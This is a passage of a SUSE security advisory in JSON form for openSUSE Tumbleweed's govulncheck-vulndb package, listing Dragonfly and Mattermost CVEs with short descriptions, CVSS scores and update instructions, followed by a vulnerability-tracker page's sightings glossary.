"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59350",
"url": "https://www.suse.com/security/cve/CVE-2025-59350"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59350"
},
{
"cve": "CVE-2025-59351",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59351"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the first return value of a function is dereferenced even when the function returns an error. This can result in a nil dereference, and cause code to panic. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59351",
"url": "https://www.suse.com/security/cve/CVE-2025-59351"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59351"
},
{
"cve": "CVE-2025-59352",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59352"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the gRPC API and HTTP APIs allow peers to send requests that force the recipient peer to create files in arbitrary file system locations, and to read arbitrary files. This allows peers to steal other peers\u0027 secret data and to gain remote code execution (RCE) capabilities on the peer\u0027s machine.This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59352",
"url": "https://www.suse.com/security/cve/CVE-2025-59352"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59352"
},
{
"cve": "CVE-2025-59353",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59353"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, a peer can obtain a valid TLS certificate for arbitrary IP addresses, effectively rendering the mTLS authentication useless. The issue is that the Manager\u0027s Certificate gRPC service does not validate if the requested IP addresses \"belong to\" the peer requesting the certificate-that is, if the peer connects from the same IP address as the one provided in the certificate request. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59353",
"url": "https://www.suse.com/security/cve/CVE-2025-59353"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59353"
},
{
"cve": "CVE-2025-59354",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59354"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the DragonFly2 uses a variety of hash functions, including the MD5 hash, for downloaded files. This allows attackers to replace files with malicious ones that have a colliding hash. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59354",
"url": "https://www.suse.com/security/cve/CVE-2025-59354"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59354"
},
{
"cve": "CVE-2025-59410",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59410"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the code in the scheduler for downloading a tiny file is hard coded to use the HTTP protocol, rather than HTTPS. This means that an attacker could perform a Man-in-the-Middle attack, changing the network request so that a different piece of data gets downloaded. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59410",
"url": "https://www.suse.com/security/cve/CVE-2025-59410"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59410"
},
{
"cve": "CVE-2025-9079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9079"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.8.x \u003c= 10.8.3, 10.5.x \u003c= 10.5.8, 9.11.x \u003c= 9.11.17, 10.10.x \u003c= 10.10.1, 10.9.x \u003c= 10.9.3 fail to validate import directory path configuration which allows admin users to execute arbitrary code via malicious plugin upload to prepackaged plugins directory",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9079",
"url": "https://www.suse.com/security/cve/CVE-2025-9079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-9079"
},
{
"cve": "CVE-2025-9081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9081"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.5.x \u003c= 10.5.8, 9.11.x \u003c= 9.11.17 fail to properly validate access controls which allows any authenticated user to download sensitive files via board file download endpoint using UUID enumeration",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9081",
"url": "https://www.suse.com/security/cve/CVE-2025-9081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-9081"
}
]
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…